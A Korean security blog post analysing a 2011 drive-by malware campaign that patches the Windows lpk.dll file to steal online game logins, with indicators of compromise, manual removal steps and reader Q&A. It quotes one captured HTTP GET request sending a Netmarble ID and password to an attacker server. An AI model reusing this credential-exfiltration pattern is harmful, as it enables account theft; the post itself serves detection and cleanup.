본문 바로가기

벌새::Analysis

lpk.dll 시스템 파일을 패치하는 악성코드 자동 감염 주의 (2011.6.12)

반응형
주말을 이용하여 웹하드 등 국내 유명 사이트들이 제로데이(0-Day) 취약점으로 추정되는 악성코드로 인하여 보안 패치가 완벽하게 이루어진 시스템에서도 자동 감염이 이루어질 수 있는 부분을 발견하였습니다.

 

Windows 7 + Internet Explorer 9 환경에서 악의적으로 변조된 인터넷 사이트에 접속할 경우 사용자 계정 컨트롤(UAC) 기능을 통해 사용자 몰래 다운로드되어 실행되려는 scvhost.exe 파일의 허용 여부를 묻는 창이 생성되는 것을 확인할 수 있습니다.


만약 Window XP + Internet Explorer 8 환경에서는 위와 같은 UAC 보안 기능이 없으므로 해킹된 인터넷 사이트에 접속하는 동작만으로 자동으로 감염되는 것을 확인하였으며, 감염 후 자동으로 웹 브라우저가 종료되는 현상이 발생하는 현상도 있습니다.

만약 해당 창에서 사용자가 [예] 버튼을 클릭할 경우 감염으로 연결이 이루어지며, [아니요]를 클릭할 경우에는 [C:\Users\(사용자 계정)\AppData\Local\Temp\Low\scvhost.exe] 파일을 찾아 수동으로 삭제하시면 됩니다.

참고로 scvhost.exe(MD5 : 92a8a413f2597e737920db00f20768c0) 파일에 대해서는 nProtect 보안 제품에서 Trojan/W32.Agent.83490 (VirusTotal : 17/42) 진단명으로 진단되고 있으며, 알약(ALYac) 2.0 보안 제품에서는 Trojan.Dropper.OnlineGames.mi32 진단명으로 진단됩니다.

[악성코드 유포 경로 및 진단 정보]

h**p://174.1**.224.**/help.html
 ㄴh**p://174.1**.224.**/main.swf
h**p://174.1**.224.**/ad.html
 ㄴ h**p://174.1**.224.**/bin.html :: CVE-2010-0806 취약점
   ㄴ h**p://174.1**.224.**/help.txt(암호화) -> scvhost.exe

main.swf (MD5 : b45163febcc2a91950a636bac5369c11)
 - nProtect : Trojan-Exploit/W32.SWFlash.3824.IZ (VirusTotal : 1/42)

bin.html
 - nProtect : Script-JS/W32.Agent.CEC (VirusTotal : 12/42)

유포되는 사이트에서는 2개의 악성 스크립트 파일을 통해 Internet Explorer 웹 브라우저의 CVE-2010-0806 취약점과 Adobe Flash Player 취약점을 이용하는 것으로 보입니다.

하지만 해당 보안 패치가 이루어진 환경에서도 Windows XP 환경에서는 자동 감염이 이루어지고, Windows 7 환경에서도 정상적으로 파일 다운로드가 된다는 점에서 알려지지 않은 새로운 Adobe Flash Player 취약점이 포함되어 있는 것이 아닌가 추정됩니다.

 

[생성 폴더 / 파일 등록 정보]

C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%
C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
C:\WINDOWS\system32\2011612204611.dll :: 해당 파일은 2011<Random 9~10자리 숫자>.dll 유형, lpk.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\lpk32.dll :: lpk.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\lpk.dll :: lpk.dll 패치 파일(악성 파일), 변경 전 파일 크기 - 22,016 Bytes / 변경 후 파일 크기 - 33,586,058 Bytes
[생성 파일 진단 정보]

C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
 - MD5 : 3C6B2938356F9AB3D406538BD6228FEE
 - Hauri ViRobot : Trojan.Win32.PSWIGames.33598862

C:\WINDOWS\system32\lpk.dll
 - MD5 : 13E9EE212FBFB0263309F87054958A34
 - AhnLab V3 : Trojan/Win32.OnlineGameHack

 

해당 악성코드에 감염된 PC는 정상적인 lpk.dll(Language Pack) 파일을 패치하여 lpk32.dll 파일로 백업을 하고, 악성 lpk.dll 파일은 정상적인 시스템 파일처럼 다양한 프로세스에 추가되어 사용자의 눈을 속이고 있습니다.

 

악성 lpk.dll 파일은 기존의 유사한 감염 방식으로 꾸준하게 발견되고 있으며, 국내 온라인 게임 피망, 넷마블, 메이플스토리, 던전앤파이터 등의 계정 정보를 탈취할 수 있습니다.

GET /ooo/net/mail.asp?a1=1&a3=(넷마블 ID)&a4=(비밀번호) HTTP/1.1
User-Agent: WinInet
Host:
www.iiiigame.com

Cache-Control: no-cache

실제 감염된 환경에서 넷마블 사이트에서 로그인을 시도할 경우 미국(USA)에 위치한 174.128.224.107 서버로 계정 정보를 이메일을 통해 전송하는 동작을 확인할 수 있습니다.

만약 보안 제품으로 문제가 해결되지 않는 분들은 다음과 같은 절차에 따라 수동으로 해결하시기 바랍니다.

먼저 모든 프로그램을 종료한 상태에서 다음의 폴더, 파일을 수동으로 삭제하시기 바랍니다.

 

  • C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%
  • C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
  • C:\WINDOWS\system32\2011(Random 9~10자리 숫자).dll

다음으로는 lpk.dll 파일의 확장자명을 다음과 같이 변경합니다.

 

  • C:\WINDOWS\system32\lpk.dll → C:\WINDOWS\system32\lpk.dll-

사용자가 악성 lpk.dll 파일의 확장자를 변경하면 윈도우 파일 보호(WFP) 기능으로 자동으로 정상적인 lpk.dll 파일이 복원되므로 참고하시기 바랍니다.

파일 확장자를 변경한 후에는 반드시 시스템 재부팅을 한 후, 다음의 파일을 수동으로 삭제하시기 바랍니다.

 

  • C:\WINDOWS\system32\lpk32.dll
  • C:\WINDOWS\system32\lpk.dll-

위와 같이 문제를 해결한 후에는 반드시 유명 보안 제품을 이용하여 시스템 정밀 검사를 하시기 바라며, 온라인 게임 해킹 예방을 위해 본인이 이용하시는 온라인 게임 계정 비밀번호를 변경하시기 바랍니다.

이번 사례의 경우에는 보안 패치가 잘 이루어진 환경에서도 자동 감염이 예상되므로 매우 주의하시기 바라며, 악성코드를 유포하는 인터넷 사이트는 되도록 이용하지 않도록 하시는 것이 차후에도 유사한 공격을 예방할 수 있는 방법입니다.

728x90
반응형
  • 갈수록 어려워지네요..
    백신설치만으로도 안심할 수 없게 되는건가요.

    • 개인 사용자가 할 수 있는 보안적 부분은 보안 패치 + 보안 프로그램 사용 + 보안 의식이 아닐까 생각됩니다.

      하지만 사실 이런 유포 방식은 정상적인 사이트에서 이루어지는 부분이라서 사실 사이트 관리자, SW 취약점 등 외부적 요소가 좌우하는 부분이 있기에 참 어렵습니다.

  • 감염 2011.06.13 16:37 댓글주소 수정/삭제 댓글쓰기

    윈도XP, IE8 보안업데이트 다 하고 있는데 어제 DC인사이드 들어가자마자 MSE가 감염됫다고 하길래 놀랐습니다. 평소에 나름 보안수칙 잘따르고 있었는데도 이러니 마이크로소프트에 대한 불신이 생깁니다

    • MS 취약점보다는 Adobe Flash 취약점으로 보입니다.

      아마 조만간 보안 패치가 나오겠지만, 엄청 국내 사이트를 쑤셔 놓을 것 같습니다.ㅠㅠ

  • 물에 잠든 혼 2011.06.15 07:30 댓글주소 수정/삭제 댓글쓰기

    v3 실시간 감시에 onlinegamehack.숫자가 감지되면서 lpk.dll이 삭제가 되었는데 그 경로가 system32가 아니라 c:/mydocu~/admini~/local~/temp던데 같은 파일이 맞나요? 나머지 프로그램파일에 이상한 문자+숫자조합 폴더 및 파일이랑 system32에 2011랜덤 숫자.dll은 해당 내용에 따라 수동 삭제 했고 현재 system32폴더에는 lpk.dll은 없고 lpk32.dll이 있는데 악성코드가 제대로 제거가 된게 맞는건지요...

    • 안녕하세요.

      지정하신 해당 경로를 봐서는 아마 악성 사이트에 접속하였을 당시 악성 파일이 다운로드되는 과정에서 V3 실시간 감시에서 차단하여 원래 다운로드 위치인 시스템 폴더가 아니라 임시 폴더에 다운로드되어 실행되지 못하고 차단 및 삭제가 된 것으로 보입니다.

      lpk.dll 파일은 반드시 PC에 존재해야 하는 파일입니다. 그러므로 lpk32.dll 파일을 lpk.dll 파일로 교체하시기 바랍니다.

  • 어렵네요?;; 2011.06.16 17:08 댓글주소 수정/삭제 댓글쓰기

    그럼 바이러스가 감지된 lpk.dll파일은 자동으로 삭제가 되나요?
    그리고 lpk32.dll, lpk.dll중 lpk를 삭제하시라는 말씀같으신데 둘 다 마이크로소프트사에 버젼은 같으며 용량크기도 같습니다만(단지 lpk32파일은 2011/6/11에 만들어졌으며 2008/4/24수정되었고 2011/6/16에 액세스가 되었습니다. lpk파일은 2008/4/24에 만들어졌으며 2008/4/24에 수정되었고 2011/6/16에 액세스가 되었습니다.)
    갑자기 lpk라는 글자가 들어간 파일에서 바이러스가 떠서 막으려고 하는데 아직 어렵네요... 왠지 두개의 파일 중 하나는 삭제를 해야하는 것 같은데, 무엇을 어떻게 삭제해야하는지 이해가 어렵네요...

    • 정상적인 파일은 2008년에 만들어진 파일이 맞습니다. 액세스는 환경에 따라 다르겠죠.

      핵심은 원래 lpk.dll 파일이 PC에 존재하며, 감염이 되면 해당 파일을 lpk32.dll 파일로 이름을 변경하고 악성 파일을 lpk.dll 파일로 등록합니다.

      최근 악성 파일을 살펴보면 마이크로소프트에서 만든 것처럼 이름까지 정확하게 일치합니다.

      파일 용량은 악성 파일에 따라 다를 수 있습니다. 용량으로 판단하기에는 위험 부담이 있습니다.

      되도록 보안 업체 전용백신을 이용하여 검사해 보시기 바랍니다.

      http://www.ahnlab.com/kr/site/download/vacc/vaccView.do?seq=101

      http://www.ahnlab.com/kr/site/download/vacc/vaccView.do?seq=104

  • youngmi choi 2011.06.21 15:27 댓글주소 수정/삭제 댓글쓰기

    몇번을 반복해서 치료해도 안 없어지고 하루종일 은행이며 증권싸이트 모두 방해받고 그래서 암담했었는데 님이 올려주신대로 하고 모두 정상으로 돌아왔네요.
    스트레스 정말 많이 받았었는데 너무 감사하단말씀 드리고 싶어요.
    좋은 하루 되세요

    • 문제가 해결되셨다니 정말 다행입니다.^^

      안전을 위해서 V3, 알약과 같은 보안 제품으로 정밀 검사를 하시기 바라며, 반드시 윈도우 보안 패치와 Adobe Flash Player 최신 버전을 이용하시기 바랍니다.

  • hihihi 2011.06.22 04:14 댓글주소 수정/삭제 댓글쓰기

    abode기능실행이거맞죠?자꾸뜨는대 괜찬겟죠? 숫자.dll도없구요
    lpk32/lpk는잇어요 \%NXU32YHysu3YDU3IDd46TGh%<이것도없구요 저안전한가요?
    자꾸뭐실행하라고뜨는거방치해도되요?

    • 말씀하시는 것으로 봐서는 감염되었던 적이 있었던 것 같기도 합니다.

      하지만 글을 봐서는 판단이 잘 되지 않는군요.

      V3, 알약 등 보안 제품으로 정밀 검사를 해보시는 것이 가장 확실합니다.

  • 감사 2011.06.29 17:42 댓글주소 수정/삭제 댓글쓰기

    정말 감사합니다.. 이문제 때문에 몇일을 고생했는데.. 잡았네요.. 다시한번 감사합니다.

  • 어렵네요?;; 2011.06.30 16:53 댓글주소 수정/삭제 댓글쓰기

    벌새님 말대로 2개 모두 돌려본 결과, 바이러스는 감지되지 않았는데,( 이거 질문하기전 알약으로 돌렸을 때만 바이러스 감지) lpk라는 파일과 lpk32파일이 여전히 있어서 뭔가 냅두면 바이러스가 다시 걸릴 것 같아서 다시 질문올립니다.
    1. 원래 둘 중 처음에는 하나만 있어야하는 건가요?

    2. lpk32나 lpk파일 중 정확히 어떤 걸 삭제해야되고, 만약 삭제를 한 lpk 유형 파일이 바이러스가 아닌 기본 lpk파일이라면 컴퓨터에 무슨 영향이 오나요?

    • 원래는 lpk.dll 파일이 윈도우 설치하면 기본으로 있습니다.

      그런데 감염이 되면 lpk.dll 파일은 악성 파일로 교체가 되고 원래 정상 파일이던 lpk.dll 파일은 lpk32.dll 파일로 변경됩니다.

      그러므로 해결을 하시려면 lpk.dll 파일의 확장자를 변경하시고, 좀 기다리시면 자동으로 lpk.dll 파일이 생성됩니다. 생성된 파일은 정상 파일입니다.(윈도우 복원 기능)

      그리고 재부팅 하신 후 확장자를 변경한 lpk.dll 파일을 제거하시면 됩니다.

  • 어렵네요?;; 2011.07.02 13:58 댓글주소 수정/삭제 댓글쓰기

    바쁘실텐데 매번 답변해주셔서 감사합니다. 저 그런데.. 죄송하나 몇 가지 질문을 더 드리고 싶습니다.

    1. 확장자를 변경한 lpk.dll이 삭제되고 다시 컴퓨터를 켜보니 WS2HELP.dll에서 바이러스가 감지되어 치료를 했는데 (다시 시작해야만 한다고 나와 다시시작을 했습니다) 다시시작 하기 전 그 파일명을 쳐보니 대문자가 아닌 ws2help.dll이라는 파일만 존재했으며 치료 후 다시시작한 상태에서는 WS2HELP.dll 라는 파일이 존재하고 ws2help.dll파일은 존재하지 않았습니다. 그러면 이 파일도 삭제를 하거나 확장자를 변경해야 되나요?

    2. 현재 이 사이트가 아닌 이상 다음, 네이버 등 다른 사이트에서 다른 곳에 들어가기만 하면( 검색 포함) 강제종료가 됬습니다. 그래서 글을 다시 읽어보고 scvhost.exe라는 파일을 찾아내어 삭제를 했습니다. 그런데 프로세스를 확인 한 결과 네트웍 서비스, 시스템, 로칼 서비스에서 각 각 2개씩 svchost.exe가 기동되어있는데 제 컴퓨터는 완전히 감염된 컴퓨터인건가요?

    • 소문자 대문자 여부는 신경쓰지 마시기 바랍니다.

      해당 파일의 악성 여부는 http://www.virustotal.com/index.html 사이트에 업로드하여 검사를 해보시면 빠르게 확인할 수 있습니다.

      svchost.exe 파일은 원래 윈도우 시스템 폴더에 존재하는 정상적인 파일이면 프로세스에서도 다수가 생성될 수 있습니다.(이건 시스템 환경에 따라 개수가 다릅니다.)

      강제 종료가 계속 이루어지는 문제는 다른 악성 파일에 계속 감염되어 있을 수 있습니다.

      일단 보안 제품으로 정밀 검사를 하시기 바랍니다. 해당 게시글은 특정 악성 파일 이야기이면 이런 유사한 종류가 다수 있습니다.

      전문 지식이 없다면 우선은 보안 제품으로 검사하시는게 가장 빠릅니다.

      또한 http://hummingbird.tistory.com/3066 게시글의 전용 백신으로도 확인해 보시기 바랍니다.

  • 어렵네요?;; 2011.07.02 14:23 댓글주소 수정/삭제 댓글쓰기

    바쁘실텐데 매번 좋은 답변 감사합니다!

  • 보리네 2011.07.03 00:31 댓글주소 수정/삭제 댓글쓰기

    2011숫자.dll파일 두개는 지워지는데요 201172184932.dll 이거 하나는 삭제가 되지 않아요. 고클린 프로그램으로 강제삭제해도 되지 않구요- 답변주세요ㅜㅜ

    • 해당 파일 자체는 악성 파일이 아닙니다.

      단지 감염되면서 정상 파일을 백업하거나 기타 다른 이유로 기록하는 파일로 보입니다.

      안전모드에서 해당 파일을 삭제해 보시기 바랍니다.

  • 어렵네요?;; 2011.08.20 01:11 댓글주소 수정/삭제 댓글쓰기

    지금 또 lpk32.dll, lpk.dll 파일이 있습니다. 전처럼 lpk확장자명을바꿔서 삭제할 껀데... 사이트가드, V3실시간 검사, 정밀검사 ( 3~ 5일마다) 하는데도 뚫리네요...
    V3lite로는 해킹을 막을 수 없는 건가요?..

  • 어렵네요?;; 2011.08.20 01:15 댓글주소 수정/삭제 댓글쓰기

    이거 정상인가요?;
    lpk32.dll, lpk.dll이 있어서 lpk 확장자 명을 바꿔서 lpk11.dll로 바꿔서 lpk.dll이 새로 생성되었습니다. 그런데 lpk11과 lpk 만든날짜가 같네요... 이거 자체가 오류인가요?

  • 어렵네요?;; 2011.08.20 01:32 댓글주소 수정/삭제 댓글쓰기

    지금 제 컴퓨터 상황이
    1. 오늘 정밀검사를 하여 바이러스가 없는 것을 확인했습니다.
    2. 타 회사 홈페이지 로그인 후 다른 타 사의 홈페이지에 들어가는 순간 인터넷 강제종료가 되었습니다.
    4. 게임핵온라인트리붓? (안철수 연구소에서 다운로드 받은 파일)을 실행하는 순간 cmd가 작동되었습니다. (이 때, cmd에 명령어 같은 글자 등은 안 떳습니다.)
    3. 순간 lpk 파일이 의심스러워 검색으로 lpk를 찾았습니다.
    4. 그러더니 lpk.dll과 lpk32.dll 이 나왔습니다.
    5. lpk의 확장자를 변경하여 재부팅후 변경한 파일을 삭제하였습니다.
    6. 다시 재부팅해서 본 결과 lpk.dll과 lpk32.dll이 여전히 남아있습니다.

    뭐가 문제일까요... 머리가 아프네요...

    • 파일명으로는 분간이 안되는군요.

      의심 파일은 http://www.virustotal.com/ 사이트에 등록하여 국내외 보안 제품에서 진단되는 여부를 확인해 보세요.

  • 어렵네요?;; 2011.08.20 10:19 댓글주소 수정/삭제 댓글쓰기

    그 홈페이지에서 둘 다 44~ 43개 안티바이러스로 검사한 결과 바이러스가 없다고 홈페이지에 떳습니다. 그런데, lpk.dll 이라는 이름을 가진 파일이 2개 있는 것이 정상인가요?
    월래 lpk.dll에 바이러스가 감염되어 lpk32.dll로 바뀌고 악성파일은 lpk.dll로 남아있는 것이 아닌가요?

    • lpk32.dll 파일은 Windows 7 환경에서는 존재하지 않는 파일입니다.

      아마 xp 환경에서도 시스템 파일로 존재하지 않을 것으로 보입니다.

      그리고 원래 시스템 파일(lpk.dll)들은 여러개가 백업식으로 존재할 수 있습니다.

  • 어렵네요?;; 2011.08.20 17:57 댓글주소 수정/삭제 댓글쓰기

    지금 컴퓨터 환경은 Windows xp인데 그러면 2 개중 하나는 삭제해야한다 라는 말씀이신가요?

    • 의심 되시는 파일을 함부로 삭제하지 마시고, http://www.virustotal.com/ 사이트에서 검사를 해보시거나 국내 보안 업체에 악성 여부를 체크 받으시기 바랍니다.

  • 어렵네요?;; 2011.08.21 08:29 댓글주소 수정/삭제 댓글쓰기

    저 그런데 쓰신 글 중 xp + explore 8일시 UAC기능이 없다고 말씀하셨는데, 그러면 xp + explore 9 이라면 UAC기능이 생기나요?